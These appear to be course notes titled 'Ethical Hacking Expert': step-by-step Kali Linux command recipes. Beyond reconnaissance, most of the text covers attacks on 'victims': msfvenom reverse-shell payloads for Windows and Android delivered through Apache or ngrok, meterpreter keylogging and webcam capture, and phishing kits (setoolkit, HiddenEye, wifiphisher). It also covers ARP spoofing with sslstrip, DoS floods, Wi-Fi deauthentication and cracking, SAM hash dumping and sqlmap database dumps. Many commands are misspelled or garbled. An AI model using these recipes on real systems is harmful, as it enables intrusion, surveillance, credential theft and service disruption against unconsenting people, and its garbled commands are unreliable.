EHE (ETHICAL HACKING EXPERT) RJ-11

1st Foot Printing

Active website copy
Passive advance google search, ip, dns
Web data extractor: - web data extractor is
used to extractor a target company’s contact
details or data such as emails fax phone
thought web for responsible b2b
communication.
Step: -
1. Open software
2. Click menu
3. Set starting url
(http://www.certifiedhacker.com)
4. And check mark stay within full url
5. And check mark all mark option
6. Then click ok
7. Click next
8. Click finish
 After complete process go to c: drive my
website---> double click index page
Dns information
1. Dns records---->srv, cname, ptr, aaa, sav
2. Whois lookup---> whois lookup reveals
available information a hostname ip address
and domain
I. Method 1---> 1.go to
website(https://www.wois.net)
2.Type any website name
II. Method 2---> 1. press windows+R 2. Type
cmd 3. type nslookup certifiedhacker.com
III. Method 3----> 1. go to browser 2. Type
https://www.dnsqueries.com 3. Sent any
domain name
IV. Method 4---> 1. Go to browser 2.
https://yougetsignal.com
V. Method 5---> 1. Dns resource records 2.
Address mapping records (a) 3. Ip version
6 address records (aaa) 4. Mail exchanger
record (m x record)
1. Dns records --->
a.Soa ---> start of authority
b. First resource record
c. Source host
d. Contact email
e.Serial number
2. NS
A. Name server record
B. Indicate authoritative name
C. Servers for the zone or
D. Domain can be used to break
E.Domain into subdomains
3. A & AAA –
A. Host records
B. Link a domain name
C. To an ip address
D. A = IPV4
E.AAA = IPV6
4. Cname
A. Canonical name
B. Alias name
C. Used to configure a custom url
example:- server1.king.jst to
www.king.jst
5. MX
A. Mail exchange records
B. Used to direct email to
C. Servers for a domain fault
D. To lerance
6. PTR
A. Also called reverse dns records
B. Reverse of an a record
C. Map an ip address to a hostname
7. SRV
A. Service records
B. To utilize some service SRV records
can be required in your domain
 C. Used to identify computers that host
specific service hostname and port
number of servers for specified service

Go TO Terminal
 Nslookup
 Set type aaa
 www.google.com

To copy website in Linux (use by httrack)

# httrack
Enter project name: iant (and other name)
Base path: /root/Desktop (to copy website
data)
Enter url: www.certifiedhacker.com (any
website url to copy website)
Enter option: 1 (show on screen)
Press Enter
Press Enter
Press Y
Press Enter
How to set vpn in kali Linux
1st download vpn to www.vpnbook.com
And download any free vpn and copy user
name and password
Open terminal and run command
# vim /etc/dhcp/dhclient.conf
Then press I (to insert file)
Go to line (# prepend domain-name-server
127.0.0.1)
Change line (prepend domain-name-server
208.67.222.222, 208.67.220.220, 8.8.8.8) type
(127.0.0.1 to 208.67.222.222, 208.67.220.220,
8.8.8.8)
Then save file press esc key and :wq to save file
Note: -check open dns in google
# service network restart
# cat /etc/resolv.conf
Then open download vpn
# cd downloads
# ls
# unzip vpnbook.com-openvpn-fr1.zip
(vpnbook file name)
# ls
# apt-get install openvpn
# openvpn vpnbook openvpn-fr1 (extract vpn
file name)
then set username:- (copy username paste)
then set password:-( copy password paste)
then go to browser
search what is my ip location
note: - your ip location change

How to kick them out {inter block of a

network}
# hit clone
https://github.com/k4m4/kickthemout.git
# cd kickthemout
# ls
# sudo –H pip3 install –r requirement.txt
# ./kickthemout.py
1. kick one off
2. Kick some off
3. Kick all off
# kickthemout>1
Choose a target :2
(go to victim machine internet not run)
Advance ip scanner: - advance ip scanner show
all network devices, gives you access you access
to shared folders and can even remotely switch
computer off
1st pc
1. Change your computer name
2. Open software
3. And scan start
4. Go to help on top and click on
install radmin server
5. Next check mark [-] I accept –
next –next –finish
6. Go to notification icon
7. Right click radmin icon-click
setting option
8. Remote click permission
9. Click permission
10. Click add user
User name
Password
 Then ok
11. And check mark [-] allow then
ok-ok
2nd pc
1. Change pc name
2. Config radmin server
3. Open advance ip scanner
4. Click start
5. Select any ip and right click
6. Click radmin full control
7. Set 1st pc radmin username and password

Nmap (ip information)

# nmap –sp 192.168.10.1-254 {to show ip and
mac address of a network}
# Zenmap {to find complete info to a system by
ip in network by graphically}
# nmap –sT –T3 –A 192.168.10.1 {to check the
running os}
# nmap –sU –T3 192.168.10.1 {to check
protocol}
# nmap –sT –T3 192.168.10.1 {to check tcp
protocol}
# nmap –A certifiedhacker.com
# Tcptraceroute certifiedhacker.com
# nmap –A www.google.com
www.cerifiedhacker.com {to check
bug}
# us 192.168.10.1 {to check all open port
uneversial scan}
# nmap 192.168.10.1 {to show open port}

How to get ip location and address

1. Open website https://www.amazon.in/
then copy link (open any website and copy
link)
2. Open website https://iplogger.org/
 3. then paste copy link in shorten box
4. click shorten
5. then copy your iplogger link for
collecting statics
6. and send this link any victim user
7. victim user click this link
8. then go to iplogger website
9. click logged ip’s
10. show victim ip

Extracting E-mail Address through the

harvester tool
1. open terminal
# Theharvester –d (any website url) –l 1000
all (any search engine goggle; Bing; yahoo)
Note: - -d = domain name; -l number of links
How to configure proxychain
# vim /etc/proxychain.conf
{# dynamic-chain (remove #)}
{strict-chain (add #)}
Go to last line and type
Socks 1 127.0.0.1 9050
Socks 5 127.0.0.1 9050
Then save file
# apt-get install tor
# service tor start
# service tor status
Open new terminal
# proxychains Firefox www.google.com
Note: - change ip
# service tor restart
Note: - more proxy list with port are available
on: - scoks-proxy.net socks24.org
Enumeration services on a target machine
[nmap]
Topic 1 nmap scans all the nodes on the given
network range and starts displaying all the
hosts that are up and running along with their
uespective mac addresses and device
information
# nmap –sp 192.168.1.0 /24 (ping scan)
# nmap –sS target machine ip (stealthy syn
scan)
# nmap –sSV –o target ip (this command
stealthy syn scan with version detection along
with os detection will be initiated)

Topic 2
Dns information gathering Enumeration
# dnsenum cerifiedhacker.com
Topic 3
Sparta tool
Sparta is python gui application that simplifies
network infra structure penetration testing by
aiding the penetration tester in the scanning
and enumeration phase
Application information gathering Sparta
Click here to add hosts to scope- set ip range
[192.168.1.1-50] click add scope
Scan result open service ip and mac
information http screen shot show server share
folder etc.
Find server and Wi-Fi router web user name
and password
Note:- required username and password
wordlist
1. go to brute tab
 2. set ip and port number
3. set http or https service
4. check mark [=] username list and click
browse
5. go to username wordlist select and
open
6. check mark password list click browser
to password wordlist select and open
7. click run

windows server enumeration

# nmap –sP 192.168.1.1
# cd /usr/share/nmap/scripts
# nmap –scripts=wsdd-discover. nse192.168.1.0
(target ip)
# sudo nmap –n –T5 –p 135,445 –script=smb-
enum-shares.nse, smb-enum-sessions.nse,
smb-os-discovery.nse, smb-enum-users.nse
192.168.1.115
Linux server enumeration
# enusn4linux –U –o (ip)
# fierce –dns certifiedhacker.com
System hacking using payload
# msfvenom –p windows/meterpreter
/reverse_tcp lhost= (our ip) lhost=4444(any
port) –f exe > /root/Desktop/virus.exe
# service postgresql start
# service metaspolit start
# vim /etc/apache2/apache2.conf
# cd Desktop
# cp virus.exe /var/www/html
# service apache2 start
# msfconsole
Msf>use exploit/multi/handler
Msf>set payload windows
/meterpreter/reverse_tcp
Msf>set lhost (our ip)
Msf>set lport 4444
Msf>show options
Msf>exploit –j –z
Show message: meterpreter session2 opened
type sessions
meterpreter>session2
{go to windows pc and open browser type
http://(kali Linux ip) virus.exe then downloads
and run }
Meterpreter>pwd (show current directory)
Meterpreter>mkdir (make directory)
Meterpreter>rmdir (remove directory)
Meterpreter> download “file name” (victim pc
download file)
Meterpreter> upload “file name” (victim pc
upload file)
Meterpreter> sysinfo (system information)
Meterpreter> getuid (user information)
Meterpreter>dir (show all folder and file)
Meterpreter>uictl disable mouse/ keyboard
(disable mouse/keyboard)
Meterpreter>uictl enable mouse/keyboard
(enable mouse/keyboard)
Manymize all system (change public ip)
Use tool kali-anonsurf
# git clone https://github.com/Und3rf10w/kali-
anonsurf
# cd kali-anonsurf
# chmod +x installer.sh
# ./installer.sh
# service tor start
# anonsurf start
# anonsurf my ip
# anonsurf change (change ip)
# anonsurf stop (stop ip)

How to hack vnc session

# msfvenom –p windows/vncinject/reverse_tcp
lhost=(our ip) lport=4444 –f exe
>/root/Desktop/google.exe
# cd Desktop
# cp google.exe /var/www/html
# service apache2 start
# service postgresql start
# msfconsole
Msf> use
exploit/windows/browser/ms11_oos_ie_css_i
mport
Msf> set payload
windows/vncinject/reverse_tcp
Msf> set lhost (our ip)
Msf> set lport 4444
Msf> show options
Msf> exploit
Note: - go to victim machine and install vnc
server open browser (kali Linux ip)/google.exe
and download and run
Meterpreter keyscan_start
keyscan_dump
webcam_snap
webcam_list
webcam_strem

How to make target base wordlist

# git clone https://github.com/Mebus/cupp
# cd cupp
# chmod +x cup.py
# ./cup.py –i
Type target information
y-y-y-y
# cat list.txt
# ./cup.py –w /root/cup/list.txt
# cat list.txt.cupp.txt
# cd dictionaries
# ls
# cd hindi (other option)
# ls
# gunzip (filename).gz (for single file)
# gunzip *.gz (for multiple file)
# ls
# cat (all file name)>> list.txt

How to make wordlist(advance)

# crunch 4 (minimum number) 8 (maximum
number)
# crunch 6 8 1234567890 –o
/root/Desktop/word.txt
# crunch 10 10 @@@@@0789 –o
/root/Desktop/r.txt
# cd /usr/share/rainbow crack
# cd charset.txt
# crunch -8 8 –f /usr/share/rainbow
crack/charset.txt alpha –o
/root/Desktop/word.txt
Dumping and cracking Sam hashes
Software ---> pwdump 7; ophcrack
1. download pwdump and extract here
2. press window key and type cmd and
right click run as administrator --->yes
3. go to pwdump location using cmd
C:\Windows\system32> pwdump7.exe
C:\Windows\system32> pwdump7.exe >
password.exe
C:\Windows\system32> password.txt
4. then download ophcrack
5. go to website
https://ophcrack.sourceforge.net/tables.ph
p
6. download vista free
7. go to ophcrack location
8. and double click ophcrack-->yes
9. click table
10. and select vista free
11. click install automatic open browser
page
12. select vista free
13. open click load
14. click pwdump file
15. click crack
 how to make virus using kali Linux
# git clone http://github.com/ytisf/theZoo.git
# cd theZoo
# chmod +x theZoo.py
# python theZoo.py
mdb> list all
mdb> search petya
mdb> use 165 (other number)
mdb> info
mdb> get
mdb> exit
go to root folder and extract here

Sniffing
# git clone
https://github.com/LionSec/xerosploit.git
# cd xerosploit
# ./ install.py
# xerosploit
Xero> scan
Xero> 192.168.1.1 (victim ip)
Xero> help (show all moduld)
Xero> pscan
Xero> run
Xero> back
Xero> sniff
Xero> run
Xero> back
Xero> inject (any file java script and html to
inject victim)
Social engineering (indoor)
# setoolkit
Press-y
Press-1
Press-2
Press-3
Press-2
Set ip 192.168.10.1 (our ip)
Set url:-https://www.facebook.com
Automatic show text --> then press “enter”
Go to new terminal
# Ettercap –I eth0 –T –q –p dns_spoof –M
Arp/192.168.0.106. // (our ip)

Social engineering (outdoor)

# git clone
https://github.comDarkSecDevelopers/HiddenE
ye
# cd HiddenEye
# pip3 install –r r(press tab key)
press>y
press>1 (any other number)
press>1
press>y
here>> facebook.com
press>1
again press enter for launch
then copy link [https://ngrok.io] and send
victim
Dos attack
# msfconsole -v
# service postgresql start
# msfdb init
# cd /usr/share/metaspolit/framework/config
# cp database.yml /root/msf4
#msfconsole
Msf> db_status
Msf> db_nmap –O 192.168.1.1-254
Msf> use auxiliary/dos/tcp/synflood
Msf> set Rhosts 192.168.1.113 (victim ip)
Msf> set rport 4444
Msf> set shost 192.168.1.114 (server ip)
Msf> exploit
DDos attack website
# hping3 –c 100000 –d 120 –s –v –w 64 – -flood
– - rand –source certifiedhacker.com (website
name)
-c= no. of packets
-d=size per packet
-s=send syn packets
-w=64 tcp windows size
-v=verbose (show)
DDos attack router gateway
# apt-get update
# apt-get install perl
# apt-get install libww-mechanize-shell-perl
# apt-get install perl-mechanize
# git clone
https://github.com/llaera/slowloris.pl
# cd slowloris.pl
# chmod +x slowloris.pl
# perl ./ slowloris.pl-dns 192.168.1.1 (gateway
ip)
How to create executable shell scripts
# gedit shell.sh
Apt-get update
Apt-get install tor
Apt-get install python3
Apt-get install wine
Then save file
# chmod +x shell.sh
# ./shell.sh

Mobile hacking (indoor network)

# ifconfig
# msfvenom –p
android/meterpreter/reverse_tcp
lhost=192.168.1.2(our ip) lport=4444 R
>/root/Desktop/android.apk
# cd Desktop
# cp android.apk /var/www/html
# service apache2 start
# service postgresql start
# msfconsole
Msf> use exploit/multi/handler
Msf> set payload
android/meterpreter/reverse_tcp
Msf> set lhost 192.168.1.2 (our ip)
Msf> set lport 4444
Msf> show option
Msf> exploit –j -z
{Send victim and install android.apk go to
victim mobile and browser and type
http://192.168.1.2/android.apk and install apk}
Show message session 1 was created
# session 1

Session hijacking
# echo 1 > /proc/sys/net/ipv4/IP_forword
# apt-get install iptables
# iptables –t nat –A PREROUTING –P tcp --
destination –port80 –j REDIRECT – t0-port 8080
# arpspoof –I eth0 –t (victim ip) (gateway ip)
Open a new terminal
# sslstoip –p –l 8080
Open a new terminal
# tail –f sslstrip.log

Wi-Fi hacking

# iwconfig
# airodump-ng wlan0
(copy mac address and channel no. of any Wi-Fi
to hack)
# airodump-ng -- bssid 4C-88-2B-01-CC-C3 (mac
address) -- channel 11 – write handshake wlan0
# airpay-ng – death 7 –a 4C-88-2B-01-CC-C3
(mac address) –c 00.00.00.00 (station id) wlan0
Then go to handshake file location and paste in
desktop location
# aircrack-ng /root/Desktop/handshake -01-
cap-w /root/Desktop/handshake wordlist.txt

Wi-Fi jam
# iwconfig
# airmon-ng
# airmon-ng start wlan0
# airodump-ng wlan0mon
# airodump –ng –c 11 (channel no.)--bssid 4C-
88-2B-01-CC-C3 (mac address) wlan0mon
# aireplay-ng -000 –a 4C-88-2B-01-CC-C3 (mac
address) wlan0mon
(particular one person)
# airplay-ng -0 0 –o 4C-88-2B-01-CC-C3 (mac
address) –c (station id) wlan0mon
Rootkit hunter
# apt-get install rkhunter
# apt-get update
# apt-get clean
# rkhunter –c

Ids/firewall/honeypot
Honeypot
# git clone
https://github.com/H4CK3RT3CH/pentbox-
1.8.git
# cd pentbox-1.8
# ls
# ./pentbox.rp
>2
>3
>2
>80
And type any message

How to hide text in .png images

1st download png image
2nd create txt file
# pip install pillow
# git clone
https://github.com/fgrime/Matraschka
# cd Matraschka
# python Matraschka.py –hide –m 123
‘password’ /root/Desktop/h.txt (txt file
location) /root/Desktop/pic.png (png file name)
{to open hide text}
# python Matraschka.py –open –m 123
‘password’ –k ‘password’
/root/Desktop/pic.png (png file name)
Hide png file to png
# cd Matraschka
# python Matraschka.py –hide –m 123
‘password’ /root/Desktop/p.png (png file
location) /root/Desktop/pic.png (png file name)

{to open hide png}

# python Matraschka.py –open –m 123
‘password’ –k ‘password’
/root/Desktop/pic.png (png file name)

Mac spoofing
# iwconfig
# macchanger –s eth0 (show current and
permanent mac address)
# macchanger –l (show mac list)
# macchanger –r eth0 (change mac)
Mac spoofing every reboot
# cd documents
# vim mac.sh
Then press I
And type
#!/bin/bash
Ifconfig eth0 down
Sleep2
Ifconfig eth0 up
Then save file
# chmod +x mac.sh
# crontab –e
Then press I
And type
@reboot /root/Documents/mac.sh
Then save file
# ./mac.sh
# reboot
Cryptography (encryption)
# git clone
https://github.com/nodesocket/cryptr.git
# cd cryptr
# chmod +x cryptr.bash
# ./cryptr.bash encrypt /root/Desktop/hack.txt
(file path and name)
password 215454
Re-type password 215454
# cat /root/Desktop/hack.txt.aes
Decrypt command
# ./cryptr.bash decrypt
/root/Desktop/hack.txt.aes (file path and
name)
How to remove/crack pdf password
# git clone
https://github.com/mangumripper/JohnTheRip
per.git
# cd JohnTheRipper
# cd run
# ls
# ./pdf2John.pl /root/Desktop/Pdffile.pdf (pdf
file name and location) /root/Desktop/.txt
(hash file location)
Open hash txt file and remove starting line
remove /root/Desktop/pdffile$-----
Don’t remove $------
# Johan –wordlist=/root/Desktop/word.txt
/root/Desktop/hash.txt

How to hide real public ip using 4nonimizer

# git clone
https://github.com/Hackeplayers/4nonimizer.gi
t
# cd 4nonimizer
# ./ 4nonimizer.install
Go to vpnbook websitr and download free all
vpn
Copy username and password
Go to download folder
Select all zip file and extract here and delete all
zip file
Copy all other folder and go to other location
computerapt4nonimizervpnvpnbook
and paste here
Copy all vpn file and paste here
Go to pass.txt and paste username and
password
# apt-get install tor
# service tor start
# 4nonimizer start

Outdoor mobile hacking

1. go to browser and type ngrok
2. get started for free
3. create new account
4.download for Linux
5.extract here
6.open terminal

# cd downloads
# cd ngrok-Stable-Linux
open browser
7. copy this link "connect your account"
and paste terminal

#. /ngrok tcp 4444

copy forwarding 0 to io
8.open new terminal

# msfvenom -p
android/meterpreter/reverse_tcp
lhost=0.tcp.ngrok.io (paste here copy to 0 to io)
lport=(type port number show ) R >
/root/Desktop/hacking. Apk

9.go to browser and google search mega.nz

10.and create new account and login
11.go to file upload and upload hacking. Apk
file
12.go to copy link and copy
13.go to browser and search shorten.st and
copy link to short
# msfconsole
Msf>use exploit/multi/handler
Msf>set payload
android/meterpreter/reverse_tcp
Msf>set lhost 0.0.0.0
Msf>set lport 4444
Msf>exploit
For advance
Download any apk file
# git clone https://github.com/M4sc3runo/Evil-
Droid
# cd Evil-Droid
# chmod +x evil-droid
#. /evil-droid (show field message don’t warry)
# vim evil-droid
Line no. 41 (0 to replace 1)
#. /evil-droid
And then yes
Select 3 then ok
Ok
Ok
Name
Path (apk file)
Select 4 option and ok
Go to avil droid and open
Send this victim
How to Install DVWA in Kali Linux
1. Download DVWA Using This Command.
# git clone
https://github.com/ethicalhack3r/DVWA.git
 Then Move It To This Directory
"/var/www/html/".
2. Download Php gd From This Link.
# apt-get install php-gd
3. Now open terminal and Type These
commands.
"cd /var/www/html/dvwa/"
"chmod 777 hackable/uploads/"
"chmod 777
external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
"chmod 777 config/"
4. Now Goto "/etc/php/7.3/apache2/" and
open "php.ini" file.

Replace "allow_url_include = Off" with

"allow_url_include = on" line 857
 Replace "display_errors = Off" with
"display_errors = on" line 477

5. Now Goto "/var/www/html/DVWA/config"

And Open "config.inc.php.dist" File.

Change Its Name From "config.inc.php.dist"

To "config.inc.php"
Insert These Lines Of Code:
Public Key:
"6LdeZUkUAAAAAAY1QOrOiYXdrr-
aN8qGNXDB6wJk" (Create Your Own Key From
The Link Below)
Private Key:
"6LdeZUkUAAAAANiTzUHGju_hvcivHCfdGoi0YJl
F" (Create Your Own Key From The Link Below)
 Link:
"https://www.google.com/recaptcha/admin/cr
eate"

You Can Change The Username And The

Password If You Like.(I Recommend You To
Follow Me.)

6. Open Terminal And Type These commands

To Start Apache & Mysql.

"service apache2 start"

"service mysql start"

7. Now Type "mysql -u root -p" Then Type

"toor" As Password (Password is invisible).
 Mysql Menu Will Open. Now Type These
Commands:html/DVWA/c

"create user dvwa;" (Username Must

Match With The Username In Config File)
"grant all on dvwa.* to dvwa@localhost
identified by 'iant';" (Password Must Match
With The Password In Config File)
"flush privileges;"
"GRANT ALL ON dvwa.* To
'dvwa'@'%';"
"FLUSH PRIVILEGES;"
"EXIT"

Restart Apache And Mysql Services After It.

8. Now Open This Link In Your Browser
"localhost/DVWA".

9. Click On "Create/Reset Database" Button.

Now You Are Ready To Go.

Username is: admin

Password is: password
After creating data base
# sqlmap –u url (website url) --dbs
# sqlmap –u url –D name --tables
# sqlmap –u url –d name –T name --columns
# sqlmap –u url –D name –T name –c name --
dump
# git clone
http://www.github.com/bdblackhat/admin-
panel-finder
# python admin-panel-finder
Target url:-
# git clone hhtps://github.com.websec/admin-
san
# chmod +x admin-san.py
# python –m pip install –r re(tab key)
Target url:- ./admin-san.py

Wifiphisher-->wifihacking without wordlist

# wget –q –o – https://archive.kali.org/archive-
key.asc apt -key add
# apt-get update
# apt-get install libnl-3-dev libne-genl-3-dev
libsse-dev -y
# git clone
https://github.com/wifiphisher/roguehostapd
# cd roguehostapd
# chmod +x setup.py
# python setup.py install
# git clone
https://github.com/wifiphisher/wifiphisher
# cd wifiphisher
# chmod +x setup.py
# python setup.py install
# cd bin
# cp wifiphisher /usr/bin/wifiphisher
# cd
# wifiphisher
Select any ssid and press enter
Select any option